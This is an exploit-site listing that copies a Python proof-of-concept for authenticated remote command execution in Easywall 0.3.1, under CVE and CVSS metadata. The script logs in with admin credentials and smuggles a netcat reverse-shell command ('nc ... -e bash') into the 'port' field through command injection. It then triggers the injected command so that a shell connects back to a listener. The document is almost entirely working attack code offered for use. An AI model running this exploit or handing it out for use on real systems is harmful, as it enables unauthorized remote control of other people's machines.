Advertisement






Easywall 0.3.1 Authenticated Remote Command Execution

CVE Category Price Severity
CVE-2021-33003 CWE-77 $5000 Critical
Author Risk Exploitation Type Date
Tomas Gonzalez High Remote 2024-03-03
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.6983 0.98028

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030007

Below is a copy:

Easywall 0.3.1 Authenticated Remote Command Execution
# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04

import requests, json, urllib3
urllib3.disable_warnings()

def exploit():
    
    # Replace values needed here
    target_host = "192.168.1.25"
    target_port= "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"
    
    target = f"https://{target_host}:{target_port}"

    # Authenticate to the app
    print("[+] Attempting login with the provided credentials...")
    login_data = {"username":user, "password":password}
    session = requests.session()
    try:
        login = session.post(f'{target}/login',data=login_data,verify=False)
    except Exception as ex:
        print("[!] There was a problem connecting to the app, error:", ex)
        exit(1)

    if login.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    else:
        print("[+] Login successfull.")    
    
    # Send the payload, the port parameter suffers from a command injection vulnerability
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
    if send_payload.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    else:
        print("[+] Payload sent.")

    # Trigger the execution of the payload
    print("[+] Attempting execution.")
    data = {"step_1":"", "step_2":""}
    execute = session.post(f"{target}/apply-save",data=data, verify=False)
    if execute.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    else:
        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")

exploit()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.